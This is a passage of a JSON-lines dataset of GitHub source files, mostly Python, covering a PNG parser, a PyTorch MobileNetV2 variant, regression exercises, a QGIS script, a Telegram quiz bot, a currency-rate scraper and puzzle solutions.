_s.close()\n\nmain()","repo_name":"Ajal333/NW-Lab","sub_path":"7_Transposition/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41589523937","text":"import struct # parsing PNG file\n\nclass TextChunkBase:\n \"\"\"\n text chunk base class\n \"\"\"\n \n def unpack_generator(self, chunk_data):\n data = chunk_data\n for byte in struct.iter_unpack(\"c\", data):\n yield byte[0]\n\n def get_data_from_chunk(self,chunk_data):\n string = \"\"\n data=[]\n for byte in self.unpack_generator(chunk_data):\n if byte == b'\\x00':\n data.append(string)\n string = \"\"\n else:\n char = byte.decode(self.ENCODING_TYPE)\n string = string + char\n data.append(string)\n return data","repo_name":"bednarek-p/PNG-Parser","sub_path":"text_chunk_base_class.py","file_name":"text_chunk_base_class.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"37733470869","text":"import torch.nn as nn\nimport math\nimport torchvision\nimport torch\n\n\n__all__ = ['mobilenetv2']\nclass ECAAttention(nn.Module):\n\n def __init__(self, kernel_size=3):\n super().__init__()\n self.gap=nn.AdaptiveAvgPool2d(1)\n self.conv=nn.Conv1d(1,1,kernel_size=kernel_size,padding=(kernel_size-1)//2)\n self.sigmoid=nn.Sigmoid()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, x):\n y=self.gap(x) #bs,c,1,1\n y=y.squeeze(-1).permute(0,2,1) #bs,1,c\n y=self.conv(y) #bs,1,c\n y=self.sigmoid(y) #bs,1,c\n y=y.permute(0,2,1).unsqueeze(-1) #bs,c,1,1\n return x*y.expand_as(x)\nclass ChannelAttention(nn.Module):\n def __init__(self, in_planes, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n\n self.fc1 = nn.Conv2d(in_planes, in_planes // 16, 1, bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_planes // 16, in_planes, 1, bias=False)\n\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n out = avg_out + max_out\n return self.sigmoid(out)\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n\n assert kernel_size in (3, 7), 'kernel size must be 3 or 7'\n padding = 3 if kernel_size == 7 else 1\n\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\nclass CBAMBlock(nn.Module):\n\n def __init__(self, channel=320,reduction=16,kernel_size=49):\n super().__init__()\n self.ca=ChannelAttention(in_planes=channel)\n self.sa=SpatialAttention()\n\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, x):\n b, c, _, _ = x.size()\n residual=x\n out=x*self.ca(x)\n out=out*self.sa(out)\n return out+residual\nclass MobileNetV2(nn.Module):\n __factory = {\n 320: torchvision.models.mobilenet_v2,\n }\n def __init__(self, depth = 320,num_classes=1000, width_mult=1.0, pretrained=True,matconvnet = None,cut_at_pooling=False):\n super(MobileNetV2, self).__init__()\n self.pretrained = pretrained\n self.matconvnet = matconvnet\n # setting of inverted residual blocks\n mobilenet_v2 = MobileNetV2.__factory[depth](pretrained=pretrained)\n self.feature_dim = 320\n self.cut_at_pooling = cut_at_pooling\n layers = list(mobilenet_v2.features.children())[:-1]\n #layers.append(CBAMBlock())\n self.features = nn.Sequential(*layers) # capture only feature part and remove last relu and maxpool\n self.gap = nn.AdaptiveMaxPool2d(1)\n # building last several layers\n #output_channel = _make_divisible(1280 * width_mult, 4 if width_mult == 0.1 else 8) if width_mult > 1.0 else 1280\n #self.conv = conv_1x1_bn(input_channel, output_channel)\n #self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n #self.classifier = nn.Linear(output_channel, num_classes)\n \n self._init_params()\n\n def forward(self, x):\n x = self.features(x)\n if self.cut_at_pooling:\n return x\n pool_x = self.gap(x)\n pool_x = pool_x.view(pool_x.size(0), -1)\n\n return pool_x, x\n # x = self.conv(x)\n # x = self.avgpool(x)\n # x = x.view(x.size(0), -1)\n # x = self.classifier(x)\n def _init_params(self):\n # optional load pretrained weights from matconvnet\n if self.matconvnet is not None:\n self.features.load_state_dict(torch.load(models_zoo.load_url('https://download.pytorch.org/models/mobilenet_v2-b0353104.pth')))\n self.pretrained = True\n \n #for m in self.modules():\n # if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. / n))\n # if m.bias is not None:\n # m.bias.data.zero_()\n # elif isinstance(m, nn.BatchNorm2d):\n # m.weight.data.fill_(1)\n # m.bias.data.zero_()\n # elif isinstance(m, nn.Linear):\n # m.weight.data.normal_(0, 0.01)\n # m.bias.data.zero_()\n\ndef mobilenetv2(**kwargs):\n \"\"\"\n Constructs a MobileNet V2 model\n \"\"\"\n return MobileNetV2(depth = 320,**kwargs)","repo_name":"ChenHuang20/OpenIBL-plus","sub_path":"ibl/models/mobilenet_v2.py","file_name":"mobilenet_v2.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21550737468","text":"import torch \r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch import nn,optim\r\n\r\n\r\n\r\nclass withPytorch(torch.nn.Module):\r\n def __init__(self,input_size,output_size):\r\n super(withPytorch, self).__init__()\r\n self.linear = nn.Linear(input_size, output_size)\r\n self.creterionLoss=torch.nn.MSELoss()\r\n\r\n def forward(self, x):\r\n yhat = self.linear(x)\r\n return yhat\r\n def loss(self,y,yhat):\r\n return torch.mean((y-yhat)**2)\r\n \r\n\r\n\r\nclass basiclr1DModel():\r\n \r\n def __init__(self,lr=0.1):\r\n self.w=torch.randn(1).requires_grad_()\r\n self.b=torch.randn(1).requires_grad_()\r\n self.lr=lr\r\n def forward(self, x):\r\n yhat=self.w*x + self.b\r\n return yhat\r\n\r\n def loss(self,yhat,y):\r\n return torch.mean((yhat-y)**2)\r\n def fit(self,x,y):\r\n print('.',end='')\r\n yhat=self.forward(x)\r\n \r\n closs=self.loss(yhat,y)\r\n closs.backward()\r\n self.w.data=self.w.data-self.lr*self.w.grad.data\r\n self.b.data=self.b.data-self.lr*self.b.grad.data\r\n self.w.grad.data.zero_()\r\n self.b.grad.data.zero_()\r\n return closs\r\n\r\nclass StochasticModel():\r\n def __init__(self,lr=0.1):\r\n self.w=torch.randn(1).requires_grad_()\r\n self.b=torch.randn(1).requires_grad_()\r\n self.lr=lr\r\n def forward(self, x):\r\n yhat=self.w*x + self.b\r\n return yhat\r\n\r\n def loss(self,yhat,y):\r\n return torch.mean((yhat-y)**2)\r\n def fit(self,loader,iterations=10,lossList=[]):\r\n \r\n for i in range(iterations): \r\n print('.',end='')\r\n localLoss=[] \r\n for x,y in loader:\r\n yhat=self.forward(x)\r\n \r\n closs=self.loss(yhat,y)\r\n closs.backward()\r\n self.w.data=self.w.data-self.lr*self.w.grad.data\r\n self.b.data=self.b.data-self.lr*self.b.grad.data\r\n self.w.grad.data.zero_()\r\n self.b.grad.data.zero_()\r\n localLoss.append(closs)\r\n lossList = torch.mean(torch.tensor(localLoss))\r\n \r\n \r\n return lossList \r\n\r\n\r\nclass Data(Dataset):\r\n def __init__(self,x,y):\r\n # self.x = torch.arange(-3, 3, 0.1).view(-1, 1)\r\n # self.y = 1 * self.x - 1\r\n self.x=x\r\n self.y=y\r\n self.len = x.shape[0]\r\n \r\n # Getter\r\n def __getitem__(self,index): \r\n return self.x[index], self.y[index]\r\n \r\n # Return the length\r\n def __len__(self):\r\n return self.len\r\n \r\n\r\ndef createData():\r\n X=torch.arange(-3,3,0.02).view(-1,1)\r\n f=0.3*X+3\r\n \r\n Y=f+torch.randn(X.size())*torch.randn(X.size())*0.2\r\n plt.plot(X.numpy(),f.numpy(),label='f')\r\n plt.plot(X.numpy(),Y.numpy(),'rx',label='y')\r\n plt.show()\r\n return [X,Y]\r\n\r\ndef train_model_BGD(model,optimizer,trainloader,iter=10):\r\n for epoch in range(iter):\r\n for x,y in trainloader:\r\n yhat = model(x)\r\n loss = model.loss(yhat, y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n\r\n optimizer.step()\r\nif __name__ == \"__main__\":\r\n [X,Y]=createData()\r\n print(\"starting learning\")\r\n model=basiclr1DModel()\r\n loss=[]\r\n iterations=20\r\n print('training.')\r\n for i in range(iterations):\r\n closs=model.fit(X,Y)\r\n loss.append(closs)\r\n\r\n #stochastic one\r\n print(\"loading data for round 2\")\r\n data=Data(X,Y)\r\n dataloader=DataLoader(dataset=data,batch_size=1)\r\n dataloader2=DataLoader(dataset=data,batch_size=5)\r\n print(\"running with batch size 1\")\r\n\r\n stochasticModel1=StochasticModel()\r\n l1=stochasticModel1.fit(dataloader,iterations)\r\n print(\"running with batch size 10\")\r\n\r\n stochasticModel2=StochasticModel()\r\n lr2=[]\r\n for i in dataloader2:\r\n print(\".\",end='')\r\n p=stochasticModel2.fit(dataloader2,iterations=2,lossList=lr2)\r\n lr2.append(p)\r\n\r\n plt.plot(range(iterations),loss,label='whole data')\r\n plt.plot(l1,label='batch size 1')\r\n plt.plot(lr2,label='batch size 10')\r\n\r\n plt.show()\r\n plt.plot(X,Y,'rx',label='original')\r\n Yhat=model.forward(X)\r\n plt.plot(X,Yhat.detach().numpy(),label='predicted batch')\r\n Yhat=stochasticModel1.forward(X)\r\n plt.plot(X,Yhat.detach().numpy(),label='1 batch')\r\n Yhat=stochasticModel2.forward(X)\r\n \r\n plt.plot(X,Yhat.detach().numpy(),label='10 batch')\r\n\r\n plt.show()\r\n\r\n\r\n #pytorch way\r\n model=withPytorch(1,1)\r\n optimizer = optim.SGD(model.parameters(), lr = 0.01)\r\n\r\n dataloader=DataLoader(dataset=data,batch_size=1)\r\n model.state_dict()['linear.weight'][0] = -15\r\n model.state_dict()['linear.bias'][0] = -10\r\n train_model_BGD(model,optimizer=optimizer,trainloader=dataloader)\r\n Yhat=model.forward(X)\r\n plt.plot(X,Y,'rx',label='original')\r\n \r\n plt.plot(X,Yhat.detach().numpy(),label='pytorch one')\r\n plt.show()\r\n","repo_name":"shubhamwert/Machine_Learning_Collection","sub_path":"IBM_pytorch/lr1D.py","file_name":"lr1D.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12298695039","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\n\n# to be used inside the Python console\n# does not reproject, does not render text and does not render raster layers\n# does not lint\n# but makes clear-cut borders\n\nmyextent = QgsRectangle(-179.999, -89.999, 179.999, 89.999)\n# myextent = QgsRectangle (-179.999,-85, 179.999, 85)\n\ncrs = QgsCoordinateReferenceSystem()\ncrs = QgsCoordinateReferenceSystem(\n 54004, QgsCoordinateReferenceSystem.EpsgCrsId)\n\nrenderer = QgsMapRenderer()\nrenderer.setDestinationCrs(crs)\nrenderer.setProjectionsEnabled(True)\nlayers = QgsMapLayerRegistry.instance().mapLayers()\nlst = layers.keys()\nrenderer.setLayerSet(lst)\nrenderer.setExtent(myextent)\n\nlayers = iface.mapCanvas().layers()\n\nmasterlayer = QgsMapLayerRegistry.instance().mapLayersByName(\n \"10m_admin_0_scale_ranks_with_minor_islands\")[0]\n\n\n# crs = QgsCoordinateReferenceSystem()\n# crs.createFromProj4(\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs\")\n# crs.createFromProj4(\"+proj=merc +lon_0=0 +k=1 +x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs\")\n# crs = QgsCoordinateReferenceSystem(54004, QgsCoordinateReferenceSystem.EpsgCrsId)\n# 54004\n# 3395\n\np = QPainter()\n\nimg = QImage(QSize(720, 360), QImage.Format_ARGB32_Premultiplied)\nimg.fill(QColor(255, 255, 255).rgb())\np.begin(img)\np.setRenderHint(QPainter.Antialiasing)\nrenderer.setOutputSize(img.size(), img.logicalDpiX())\nrenderer.render(p)\np.end()\nimg.save(\"render.png\", \"png\")\n","repo_name":"cprima/sunlightmap","sub_path":"application/physical/GIS/mypyqgis.py","file_name":"mypyqgis.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17614632753","text":"__doc__ = '''\nEdit User date format to comply with ZEN-28191\n\n$Id:$\n'''\n\nimport logging\nlog = logging.getLogger(\"zen.migrate\")\nimport Migrate\n\n\nclass UpdateUserDatetimeSettings(Migrate.Step):\n version = Migrate.Version(200, 0, 1)\n\n def cutover(self, dmd):\n df_map = {\n 'YY/MM/DD': 'YYYY/MM/DD',\n 'DD/MM/YY': 'DD/MM/YYYY',\n 'MM/DD/YY': 'MM/DD/YYYY'\n }\n\n for usr in dmd.ZenUsers.getAllUserSettings():\n if usr.dateFormat in df_map:\n log.info(\n 'update user %s dateFormat from %s to %s',\n usr.id, usr.dateFormat, df_map[usr.dateFormat]\n )\n usr.dateFormat = df_map[usr.dateFormat]\n\n\nUpdateUserDatetimeSettings()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/UpdateUserDatetimeSettings.py","file_name":"UpdateUserDatetimeSettings.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"828069604","text":"from random import Random\n\nfrom Events.Game.gameState import GameState\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.enum.enumStatus import UavStatus\nfrom Events.Game.move.algos.GameObjects.movableObject import MovableObject\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.settings import Settings\n\n\nclass Event():\n def __init__(self, time_of_event, event_owner,tk_master,game_state):\n self.time_of_event=time_of_event\n\n self.event_owner:MovableObject=event_owner\n self.visualisation_delay=1\n self.game_state:GameState=game_state\n self.tk_master=tk_master\n\n def handle_event(self,event_list,settings:Settings,rand:Random,iteration_function):\n self.event_owner.delete_current_event(event_list)\n\n\n self.event_owner.set_status(self.event_owner.next_status)\n self.event_owner.set_new_position(self.event_owner.target_position,self.time_of_event)\n if settings.visualisation in [1,2] and not settings.is_multirun and not self.game_state.is_training:\n self.tk_master.after(self.visualisation_delay,iteration_function)\n\n\n\n\n\n","repo_name":"vatrasar/masterthessis2","sub_path":"Events/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"260974635","text":"# coding: utf-8\n\n\nclass MyException(Exception):\n pass\n\n\ndef read_demo1():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n chunk = 100\n while True:\n content = file.read(chunk)\n if not content:\n break\n file_content += content\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo2():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n limit = 1000\n while True:\n content = file.readline(limit)\n if not content:\n break\n file_content += content\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo3():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n lines = file.readlines()\n for line in lines:\n file_content += line\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo4():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n for line in file:\n file_content += line\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef write_demo1():\n file_name = 'xxx.txt'\n try:\n with open(file_name, mode='a', encoding='utf-8') as file:\n file.write('Hello World')\n file.writelines(['111\\n', '222\\n', '333\\n'])\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 写入完成')\n finally:\n print('最终处理逻辑')\n\n\ndef copy_file(src, dist):\n chunk = 1024 * 10\n try:\n with open(src, mode='rb') as old_file:\n try:\n with open(dist, mode='wb') as new_file:\n while True:\n content = old_file.read(chunk)\n if not content:\n break\n new_file.write(content)\n except FileNotFoundError as err:\n print(f'{dist} 文件无法创建, {err}')\n except FileNotFoundError as err:\n print(f'{src} 文件不存在, {err}')\n\n\nif __name__ == '__main__':\n old_file_name = r'C:\\Users\\zjw\\Downloads\\黑马python\\python就业班\\01 网络编程\\02-udp\\04-udp发送数据的强调.flv'\n new_file_name = r'C:\\Users\\zjw\\Desktop\\xxx.flv'\n copy_file(old_file_name, new_file_name)\n","repo_name":"similove/python-study","sub_path":"文件.py","file_name":"文件.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409750866","text":"import logging\n\nfrom zeam import component\nfrom zeam.form.base.interfaces import IFormData\nfrom zeam.form.silva.interfaces import IXMLFormSerialization\nfrom zeam.form.silva.interfaces import IXMLFieldSerializer\nfrom zeam.form.silva.interfaces import IXMLFieldDeserializer\nfrom Products.Formulator.Errors import ValidationError\nfrom Products.Formulator.zeamsupport import IFormulatorField\n\nlogger = logging.getLogger('silva.core.xml')\n\n\nclass FieldSerializer(component.Component):\n \"\"\"Make possible to serialize a field in XML.\n \"\"\"\n component.adapts(IFormulatorField, IFormData)\n component.provides(IXMLFieldSerializer)\n\n def __init__(self, field, form, value):\n self.identifier = field.identifier\n self.field = field._field\n self.form = form\n self.value = value\n\n def serialize(self, producer):\n if self.value is not None:\n self.field.validator.serializeValue(\n self.field, self.value, producer)\n\n def __call__(self, producer):\n self.serialize(producer)\n\n\nclass FieldDeserializer(component.Component):\n \"\"\"Make possible to deserialize a field in XML.\n \"\"\"\n component.adapts(IFormulatorField, IFormData)\n component.provides(IXMLFieldDeserializer)\n\n def __init__(self, field, form):\n self.identifier = field.identifier\n self.field = field._field\n self.form = form\n\n def deserialize(self, data, context=None):\n try:\n return self.field.validator.deserializeValue(\n self.field, data, context=context)\n except ValidationError as error:\n logger.error(\n u'Cannot set Formulator field value %s: %s',\n self.field.getId(), str(error.error_text))\n\n def write(self, value):\n self.form.getContentData().set(self.identifier, value)\n\n def __call__(self, data, context=None):\n self.write(self.deserialize(data, context=context))\n\n\nclass XMLFormSerialization(component.Component):\n component.adapts(IFormData)\n component.provides(IXMLFormSerialization)\n\n def __init__(self, form):\n self.form = form\n\n def getSerializers(self):\n form = self.form\n assert form.getContent() is not None\n content = form.getContentData()\n for field in form.fields:\n try:\n value = content.get(field.identifier)\n except KeyError:\n continue\n factory = component.getComponent(\n (field, form), IXMLFieldSerializer)\n yield factory(field, form, value)\n\n def getDeserializers(self):\n form = self.form\n deserializers = {}\n for field in form.fields:\n deserializers[field.identifier] = component.getWrapper(\n (field, form), IXMLFieldDeserializer)\n return deserializers\n","repo_name":"silvacms/zeam.form.silva","sub_path":"src/zeam/form/silva/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995265474","text":"\"\"\"\r\nentradas\r\nP-->int-->p\r\nQ-->int-->q\r\ncaja negra\r\nexpresión-->int-->e\r\nsalidas\r\nsatisface o no satisface la expresión-->int-->s\r\n\"\"\"\r\n#entradas\r\np=int(input(\"Digite P:\"))\r\nq=int(input(\"Digite Q:\"))\r\n#caja negra\r\ne=(p**3)+(q**4)-(2*(p**2))\r\ns=\"\"\r\nif(e>680):\r\n s=(f\"{p} y {q} satisfacen la expresion\")\r\nelse:\r\n s=(f\"{p} y {q} no satisfacen la expresion\")\r\n #salidas\r\nprint(s)","repo_name":"Jcetina2212/Tallerestructuradecontrolselectivo","sub_path":"Ejercicio8.py","file_name":"Ejercicio8.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7519883144","text":"import logging\n\nfrom telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, MessageHandler, Filters, CommandHandler, ConversationHandler\nfrom json import load\nfrom random import choice\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG\n)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = ''\n\n\ndef start(update, context):\n # update.message.reply_text(\"Предлагаю пройти опрос\")\n with open('тестирующая_система.json') as f:\n f = load(f)\n d_first = choice(f['test'])\n f['test'].remove(d_first)\n context.user_data['questions'] = f['test']\n context.user_data['response'] = d_first['response']\n context.user_data['corr_response'] = 0\n update.message.reply_text(d_first['question'])\n return 1\n\n\ndef user_response(update, context):\n if not context.user_data['questions']:\n update.message.reply_text(f'Ваш результат: {context.user_data[\"corr_response\"]}\\n'\n f'Чтобы попробовать ещё раз введите /start')\n return ConversationHandler.END\n if update.message.text.lower() == context.user_data['response'].lower():\n context.user_data['corr_response'] += 1\n t = choice(context.user_data['questions'])\n context.user_data['questions'].remove(t)\n context.user_data['response'] = t['response']\n update.message.reply_text(t['question'])\n return 1\n\n\ndef stop(update, context):\n update.message.reply_text(\"Всего доброго!\")\n return ConversationHandler.END\n\n\ndef main():\n updater = Updater(TOKEN)\n dp = updater.dispatcher\n\n conv_handler = ConversationHandler(\n # Точка входа в диалог.\n # В данном случае — команда /start. Она задаёт первый вопрос.\n entry_points=[CommandHandler('start', start)],\n\n states={\n 1: [MessageHandler(Filters.text, user_response)],\n },\n # Точка прерывания диалога. В данном случае — команда /stop.\n fallbacks=[CommandHandler('stop', stop)]\n )\n\n dp.add_handler(conv_handler)\n # dp.add_handler(CommandHandler('start', start))\n updater.start_polling()\n # Ждём завершения приложения.\n # (например, получения сигнала SIG_TERM при нажатии клавиш Ctrl+C)\n updater.idle()\n\n\n# Запускаем функцию main() в случае запуска скрипта.\nif __name__ == '__main__':\n main()","repo_name":"dm1itri/telegram_bot","sub_path":"Бот «Тестирующая система».py","file_name":"Бот «Тестирующая система».py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39740695131","text":"import algo.matrix_util as mu\nimport itertools\nimport numpy as np\nimport unittest\n\nLIT = \"1\"\nUNLIT = \"0\"\nTO_BIT = {\"#\": LIT, \".\": UNLIT}\nINIT_SIZE = 1000\n\ndef expand_array(arr, fill_char):\n nr, nc = arr.shape\n\n # Add columns first.\n new_col = np.full((nr, 1), fill_char)\n arr = np.concatenate((new_col, arr, new_col), axis=1)\n\n # Then add rows.\n new_row = np.full((1, nc+2), fill_char)\n arr = np.concatenate((new_row, arr, new_row), axis=0)\n return arr\n\ndef parse_input(path_in):\n with open(path_in, 'r') as f:\n input = f.read().split()\n enhance_str = \"\".join(map(lambda c: TO_BIT[c], input[0]))\n img = np.array([list(s) for s in input[1:]])\n to_bit = np.vectorize(lambda c: TO_BIT[c])\n img = to_bit(img)\n img = expand_array(img, UNLIT)\n return (enhance_str, img)\n\ndef get_test_cases():\n num_cases = 1\n if num_cases == 1:\n cases = [\"input20_test.txt\"]\n else:\n num_cases_to_test = 1\n cases = [\"input20_test%s.txt\" % (case+1) for case in range(num_cases_to_test)]\n return cases\n\ndef solve(f):\n input = parse_input(\"input20.txt\")\n return f(*input)\n\n####################### Day 20.1: Trench Map #######################\ndef to_pixels(img):\n to_pixel = {}\n for k, v in TO_BIT.items():\n to_pixel[v] = k\n to_pixel_func = np.vectorize(lambda c: to_pixel[c])\n img = to_pixel_func(img)\n return \"\\n\".join([\"\".join(row) for row in img])\n\ndef count_lit(img):\n return len(img[img == LIT])\n\ndef step(enhance_str, img):\n void_char = img[0][0]\n next_void_char = enhance_str[0 if void_char == UNLIT else -1]\n\n def next_bit(img, r, c):\n row_in_range = mu.in_range((0, len(img)))\n col_in_range = mu.in_range((0, len(img[0])))\n bits = []\n # for ar, ac in itertools.product(range(r-1, r+2), range(c-1, c+2)):\n for ar in range(r-1, r+2):\n for ac in range(c-1, c+2):\n if row_in_range(ar) and col_in_range(ac):\n bits.append(img[ar][ac])\n else:\n bits.append(void_char)\n enhance_ind = int(\"\".join(bits), 2)\n return enhance_str[enhance_ind]\n\n new_img = img.copy()\n for r, c in itertools.product(range(len(img)), range(len(img[0]))):\n new_img[r][c] = next_bit(img, r, c)\n\n new_img = expand_array(new_img, next_void_char)\n return new_img\n\ndef part1(enhance_str, img):\n num_steps = 2\n # print(to_pixels(img))\n for i in range(num_steps):\n img = step(enhance_str, img)\n return count_lit(img)\n\nclass Part1Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != part1:\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n\n def test_part1(self):\n cases = get_test_cases()\n expecteds = [35]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part1(*parse_input(case))\n self.assertEqual(expected, actual)\n\n####################### Day 20.2: Trench Map #######################\ndef part2(enhance_str, img):\n num_steps = 50\n # print(to_pixels(img))\n for i in range(num_steps):\n img = step(enhance_str, img)\n return count_lit(img)\n\nclass Part2Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != part2:\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n\n def test_part2(self):\n cases = get_test_cases()\n expecteds = [3351]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part2(*parse_input(case))\n self.assertEqual(expected, actual)\n\n############################### Main ###############################\nFUNC_TO_TEST = part2\n\nif __name__ == \"__main__\":\n # unittest.main()\n print(solve(FUNC_TO_TEST))\n","repo_name":"wxiang54/advent-of-code","sub_path":"2021/20/q20.py","file_name":"q20.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33546440144","text":"import requests\nimport datetime\nimport calendar\nimport xml.etree.ElementTree as ET\n\nimport pymysql\nfrom pymysql.cursors import DictCursor\n\nconnection = pymysql.connect(\n host='localhost',\n user='kommunar',\n password='123',\n db='price',\n charset='utf8mb4',\n cursorclass=DictCursor\n)\n\n# 2015 -09 -23\nfor y in range(2017,2020):\n for m in range(1,13):\n for d in range(1, 32):\n params = {'date_req':'{:02}.{:02}.{}'.format(d,m,y)}\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp', params = params)\n\n root = ET.fromstring(response.text)\n\n for idx,Valute_element in enumerate(root.findall('Valute')):\n\n NumCode = Valute_element.find('NumCode').text\n CharCode = Valute_element.find('CharCode').text\n Nominal = Valute_element.find('Nominal').text\n Name = Valute_element.find('Name').text\n Value2 = Valute_element.find('Value').text\n\n if CharCode == 'USD':\n query = \"INSERT INTO price.valuta(NumCode, CharCode, dateCalendar, ValueVal, Nominal) \" \\\n \"VALUES(%s,%s,%s,%s,%s)\"\n args = (NumCode, CharCode, datetime.datetime(int(y),int(m),int(d)).strftime('%Y-%m-%d %H:%M:%S'), float(Value2.replace(',','.')), int(Nominal))\n cursor = connection.cursor()\n cursor.execute(query, args)\n connection.commit()\n\nconnection.close()","repo_name":"Kommunarus/RosStat","sub_path":"parsing/parsCursValut.py","file_name":"parsCursValut.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447908511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef solve(cipher):\n inputs = cipher.split()\n max_shyness = inputs[0]\n accum = 0\n invites = 0\n for shyness, num in enumerate (inputs[1]):\n if accum < shyness:\n new_invite = shyness - accum\n invites += new_invite\n accum += new_invite + int(num)\n else:\n accum += int(num)\n return invites\n\nif __name__ == \"__main__\":\n testcases = input()\n\n for caseNr in xrange(1, testcases+1):\n cipher = 